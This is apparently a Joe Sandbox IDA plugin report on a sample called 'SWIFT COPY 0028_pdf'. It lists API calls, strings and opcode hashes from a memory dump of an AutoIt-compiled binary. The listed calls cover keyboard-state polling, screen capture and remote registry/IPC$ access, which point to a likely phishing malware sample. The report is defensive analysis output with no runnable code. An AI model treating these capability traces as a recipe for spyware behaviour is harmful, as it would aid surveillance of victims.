                                                                                    • Opcode ID: 0cde17fa4b7cb5e6e46f602a70d0ad1acef148ab3035faa626024e7a508fb3f7
                                                                                    • Instruction ID: 7c2eca29fe9d1770aea2592ac95aa32c17269b090e594b3f3be0dd309e9087d9
                                                                                    • Opcode Fuzzy Hash: 0cde17fa4b7cb5e6e46f602a70d0ad1acef148ab3035faa626024e7a508fb3f7
                                                                                    • Instruction Fuzzy Hash: 02517071900219AFDF10DF91DD45EEEBBBAFF45301F04821AF912A7290DB349A09DBA5
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00979E36
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00979E42
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00979E4E
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00979E5B
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00979EAF
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00979EEB
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00979F0F
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00979F17
                                                                                    • DeleteObject.GDI32(?), ref: 00979F20
                                                                                    • DeleteDC.GDI32(00000006), ref: 00979F27
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00979F32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: 197cc933d6ee40e82bdaab2a1f226d4dbf294f78d2f52913c656aada0a8dbe6d
                                                                                    • Instruction ID: 35a60463ee37993c8bfa444b32349f5c735f508714c2a6bdc132634cff0dea4b
                                                                                    • Opcode Fuzzy Hash: 197cc933d6ee40e82bdaab2a1f226d4dbf294f78d2f52913c656aada0a8dbe6d
                                                                                    • Instruction Fuzzy Hash: 11513A76904309EFCB14CFA8CC85EAEBBB9EF49710F14841DF95A97250D735A941CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-2391861430
                                                                                    • Opcode ID: 8d6036a6da767822b87773c089697e3fe30ec0cf2707680c6341042708cf7e93
                                                                                    • Instruction ID: a070c22bd706d0775958e7c379ae07c10438166a3e082ede9406a561c0c3871d
                                                                                    • Opcode Fuzzy Hash: 8d6036a6da767822b87773c089697e3fe30ec0cf2707680c6341042708cf7e93
                                                                                    • Instruction Fuzzy Hash: 25519CB1800119BACB15EBA0DD86FEEB778AF84304F104166F505721A6EB316F99DBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-3420473620
                                                                                    • Opcode ID: b1981e635a11d769fdc5920411ccfacbeff972d1835f8dfb8fa4916f2d04fb5f
                                                                                    • Instruction ID: 7988d67307737a4edc96121e48b57b18f9c6d42d59f96ca48f02e829de3faa7d
                                                                                    • Opcode Fuzzy Hash: b1981e635a11d769fdc5920411ccfacbeff972d1835f8dfb8fa4916f2d04fb5f
                                                                                    • Instruction Fuzzy Hash: 1351CDB1800219AACF14EBE0DD86FEEB778AF84344F104066F505720A2EB746F99DF61
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009655D7
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00965664
• GetMenuItemCount.USER32(009E1708), ref: 009656ED
• DeleteMenu.USER32(009E1708,00000005,00000000,000000F5,?,?), ref: 0096577D
• DeleteMenu.USER32(009E1708,00000004,00000000), ref: 00965785
• DeleteMenu.USER32(009E1708,00000006,00000000), ref: 0096578D
• DeleteMenu.USER32(009E1708,00000003,00000000), ref: 00965795
• GetMenuItemCount.USER32(009E1708), ref: 0096579D
• SetMenuItemInfoW.USER32(009E1708,00000004,00000000,00000030), ref: 009657D3
• GetCursorPos.USER32(?), ref: 009657DD
• SetForegroundWindow.USER32(00000000), ref: 009657E6
• TrackPopupMenuEx.USER32(009E1708,00000000,?,00000000,00000000,00000000), ref: 009657F9
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00965805
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: f67a4c8f8394945b3055c6ce48aa9205ef26b42c375b2c7becf3baa8ceff0d59
• Instruction ID: 2732fea76fbc1d890c0f75137e37bd62cee7251bdf0e6326901e685229a3acc5
• Opcode Fuzzy Hash: f67a4c8f8394945b3055c6ce48aa9205ef26b42c375b2c7becf3baa8ceff0d59
• Instruction Fuzzy Hash: 21710570645A05BFFB209F54CC89FAABF69FF41368F250206F519AA1E1C7B16C10DB90
APIs
• _memset.LIBCMT ref: 0095A1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0095A211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0095A22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0095A249
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0095A273
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0095A29B
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095A2A6
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095A2AB
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1687751970-22481851
• Opcode ID: 82ef9e5199b402f5c136dab4beeb5b92a8d5ed83044a791bc3ef1490b80ea11c
• Instruction ID: 7301919ec0cd0bb9dc8117865c6e8732402212068ef55a9a86676f2ecafab18a
• Opcode Fuzzy Hash: 82ef9e5199b402f5c136dab4beeb5b92a8d5ed83044a791bc3ef1490b80ea11c
• Instruction Fuzzy Hash: 8141E976C11229ABDF11EBA4EC85EEDB7B8BF54700F004129F911B7161EB709E15DB90
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
Strings
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: f87bdf0ddd99b598f85e17addf110493b87cfcefe84774d5b30b6a086a5183ad
• Instruction ID: d7a431478759b31e7f1591d2b50b6bebea3eef3036ae2ca7409144debd40e723
• Opcode Fuzzy Hash: f87bdf0ddd99b598f85e17addf110493b87cfcefe84774d5b30b6a086a5183ad
• Instruction Fuzzy Hash: C7412F3015024A8BDF14FF14E851AEE33A5AF62740F509859FC952B7D6EB74AE0ACB50
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009936F4,00000010,?,Bad directive syntax error,009BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009625D6
• LoadStringW.USER32(00000000,?,009936F4,00000010), ref: 009625DD
• _wprintf.LIBCMT ref: 00962610
• __swprintf.LIBCMT ref: 00962632
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009626A1
Strings
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1080873982-4153970271
• Opcode ID: ad242e745fc387eabe58b9ef8b21a57453f45efda444b30351b0346576fd9897
• Instruction ID: 451d767f1e85920108029b4b7072738673ae94e669a77796a3ac0a86726df587
• Opcode Fuzzy Hash: ad242e745fc387eabe58b9ef8b21a57453f45efda444b30351b0346576fd9897
• Instruction Fuzzy Hash: 7A21807184022ABFDF11AF90DC0AFEE7B38BF58308F004456F515661A2EA71AA24DB51
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00967B42
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00967B58
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00967B69
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00967B7B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00967B8C
Strings
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 890592661-1007645807
• Opcode ID: bfe5485dc383c6f6720c8edf07255fcf7601284fddcfbe32c9600d9cbf194a86
• Instruction ID: c9aa301a880822546ad1752726a8a8002ed7a002bcde93fed1df0f606aff46f6
• Opcode Fuzzy Hash: bfe5485dc383c6f6720c8edf07255fcf7601284fddcfbe32c9600d9cbf194a86
• Instruction Fuzzy Hash: D911C4F069026979E720B7B1DC4AEFFBB7CEBD1B04F00452A7411A31D5DA604A44C5B1
APIs
• timeGetTime.WINMM ref: 00967794
  • Part of subcall function 0093DC38: timeGetTime.WINMM(?,7694B400,009958AB), ref: 0093DC3C
• Sleep.KERNEL32(0000000A), ref: 009677C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009677E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00967806
• SetActiveWindow.USER32 ref: 00967825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00967833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00967852
• Sleep.KERNEL32(000000FA), ref: 0096785D
• IsWindow.USER32 ref: 00967869
• EndDialog.USER32(00000000), ref: 0096787A
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: a5be56dd08d48d9eea312e024f4ef544d002f3f47be11023b5a9ae52f6e0bac5
• Instruction ID: ff471d75a4a0c8e00faca3617162436e3d94cf18cb58baa328cb0a99f3fe97d0
• Opcode Fuzzy Hash: a5be56dd08d48d9eea312e024f4ef544d002f3f47be11023b5a9ae52f6e0bac5
• Instruction Fuzzy Hash: E92158B022D245BFE7045BA0ECCDF2A7F6AFB45349F44A064F50687662CB618D00FAA0
APIs
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
  • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
• CoInitialize.OLE32(00000000), ref: 0097034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009703DE
• SHGetDesktopFolder.SHELL32(?), ref: 009703F2
• CoCreateInstance.OLE32(009ADA8C,00000000,00000001,009D3CF8,?), ref: 0097043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009704AD
• CoTaskMemFree.OLE32(?,?), ref: 00970505
• _memset.LIBCMT ref: 00970542
• SHBrowseForFolderW.SHELL32(?), ref: 0097057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009705A1
• CoTaskMemFree.OLE32(00000000), ref: 009705A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009705DF
• CoUninitialize.OLE32(00000001,00000000), ref: 009705E1
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 5bf5538106e490dd0b4537c41f62c7c460de23cb9a6d892346ec5f22da0a5564
• Instruction ID: 627504a13093513c6251574d40a7e7797858f2bbd936592e4ef640876b3addb2
• Opcode Fuzzy Hash: 5bf5538106e490dd0b4537c41f62c7c460de23cb9a6d892346ec5f22da0a5564
• Instruction Fuzzy Hash: 46B1C875A00119EFDB04DFA4C888EAEBBB9FF89304B148459F90AEB251D730EE41CB50
APIs
• GetKeyboardState.USER32(?), ref: 00962ED6
• SetKeyboardState.USER32(?), ref: 00962F41
• GetAsyncKeyState.USER32(000000A0), ref: 00962F61
• GetKeyState.USER32(000000A0), ref: 00962F78
• GetAsyncKeyState.USER32(000000A1), ref: 00962FA7
• GetKeyState.USER32(000000A1), ref: 00962FB8
• GetAsyncKeyState.USER32(00000011), ref: 00962FE4
• GetKeyState.USER32(00000011), ref: 00962FF2
• GetAsyncKeyState.USER32(00000012), ref: 0096301B
• GetKeyState.USER32(00000012), ref: 00963029
• GetAsyncKeyState.USER32(0000005B), ref: 00963052
• GetKeyState.USER32(0000005B), ref: 00963060
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 037302aec01a8e7af922673a75782f7ab568b284e976d1e1d95ee19202874b85
• Instruction ID: de552b3c7b75f6e28c0faae8043597022572b010b89b1951ce22377bd8df22f6
• Opcode Fuzzy Hash: 037302aec01a8e7af922673a75782f7ab568b284e976d1e1d95ee19202874b85
• Instruction Fuzzy Hash: 1C51FA24A08BC429FB35DBB489107EEBFF85F12344F08859ED5C25A5C2DB549B8CC7A2
APIs
• GetDlgItem.USER32(?,00000001), ref: 0095ED1E
• GetWindowRect.USER32(00000000,?), ref: 0095ED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0095ED8E
• GetDlgItem.USER32(?,00000002), ref: 0095ED99
• GetWindowRect.USER32(00000000,?), ref: 0095EDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0095EE01
• GetDlgItem.USER32(?,000003E9), ref: 0095EE0F
• GetWindowRect.USER32(00000000,?), ref: 0095EE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0095EE63
• GetDlgItem.USER32(?,000003EA), ref: 0095EE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0095EE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 0095EE9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 09691977ab5b518d8cbb179901f18c3a2fee1afbe5c442944eca949e975bb920
                                                                                    • Instruction ID: 5c5fc85cfdcce94e9e2475872d50cfa54e33853582b01a4315fa930efc1e7fc0
                                                                                    • Opcode Fuzzy Hash: 09691977ab5b518d8cbb179901f18c3a2fee1afbe5c442944eca949e975bb920
                                                                                    • Instruction Fuzzy Hash: 5A513271B10205AFDB18CF69DD85AAEBBBAFF89301F14812DF91AD7290D7719E048B50
                                                                                    APIs
                                                                                      • Part of subcall function 0093B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0093B759,?,00000000,?,?,?,?,0093B72B,00000000,?), ref: 0093BA58
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0093B72B), ref: 0093B7F6
                                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0093B88D
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0099D8A6
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D8D7
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D8EE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D90A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0099D91C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: 40874316a43bf70befae07f2f79a2530568830986197699f2f5d0f81646caaaa
                                                                                    • Instruction ID: 313c5848ab26bbc36f096c6f8e9373eef4790748bbe1195e0c1ee8314c7d6aef
                                                                                    • Opcode Fuzzy Hash: 40874316a43bf70befae07f2f79a2530568830986197699f2f5d0f81646caaaa
                                                                                    • Instruction Fuzzy Hash: C6618930516640DFDB26AF19D9C8B65B7F9FF95716F14051DE2868AA60C734AC80EF80
                                                                                    APIs
                                                                                      • Part of subcall function 0093B526: GetWindowLongW.USER32(?,000000EB), ref: 0093B537
                                                                                    • GetSysColor.USER32(0000000F), ref: 0093B438
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 65c534ea9c3f631efa6d338f196066ce185f65d2657e8f0ca086bbcf89aef598
                                                                                    • Instruction ID: 6bb67d2351a948edea6f82dd2f05c772a59546df5689c0659a52c15067aedaad
                                                                                    • Opcode Fuzzy Hash: 65c534ea9c3f631efa6d338f196066ce185f65d2657e8f0ca086bbcf89aef598
                                                                                    • Instruction Fuzzy Hash: 1C41F330109144AFDF245F28DC89BB93B6AAF06731F184265FE668E5F6C7318C41EB65
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                    • String ID:
                                                                                    • API String ID: 136442275-0
                                                                                    • Opcode ID: 34d55936fb717d0b5b2efa33f4cd9cb97dde5586b556893d6e86b9b312e570b0
                                                                                    • Instruction ID: 6dce46570073e7280ad24bf8eabc8ae883df631fea5e0e83f65455a4cca288ba
                                                                                    • Opcode Fuzzy Hash: 34d55936fb717d0b5b2efa33f4cd9cb97dde5586b556893d6e86b9b312e570b0
                                                                                    • Instruction Fuzzy Hash: FC41E17684521CAECF61DB94CC85DDF73BCEB84310F0041A6B659A2091EB71ABE98F51
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(009BDC00,009BDC00,009BDC00), ref: 0096D7CE
                                                                                    • GetDriveTypeW.KERNEL32(?,009D3A70,00000061), ref: 0096D898
                                                                                    • _wcscpy.LIBCMT ref: 0096D8C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: 9349ea997451e484c2e7595823a2e3360c2fedbbbbed7df86874107a2143a7f0
                                                                                    • Instruction ID: 45d5eb2d441f301eb9c20182b1a8b3772c2769c8454f02f42b7aa20c278e59f3
                                                                                    • Opcode Fuzzy Hash: 9349ea997451e484c2e7595823a2e3360c2fedbbbbed7df86874107a2143a7f0
                                                                                    • Instruction Fuzzy Hash: 04519275649300AFC710EF14D892BAEB7A5EFD4314F10892EF5AA572A2DB31DD05CA82
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 009293AB
                                                                                    • __itow.LIBCMT ref: 009293DF
                                                                                      • Part of subcall function 00941557: _xtow@16.LIBCMT ref: 00941578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_xtow@16
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 1502193981-2263619337
                                                                                    • Opcode ID: 848dee6faa485f4f6ebdd637eb20a72cdbab3fb56994232a487b883baf66f0ee
                                                                                    • Instruction ID: 2499f6cc78fd7d21affdec0dfa25f2c85a6592506a950668df1c3f2ae4bf9180
                                                                                    • Opcode Fuzzy Hash: 848dee6faa485f4f6ebdd637eb20a72cdbab3fb56994232a487b883baf66f0ee
                                                                                    • Instruction Fuzzy Hash: 4741D8719042149FDB25DF78E951FAA73E8EF88300F20486EF18AD71D5EA35D942CB51
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0098A259
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0098A260
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0098A273
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0098A27B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0098A286
                                                                                    • DeleteDC.GDI32(00000000), ref: 0098A28F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0098A299
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0098A2AD
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0098A2B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
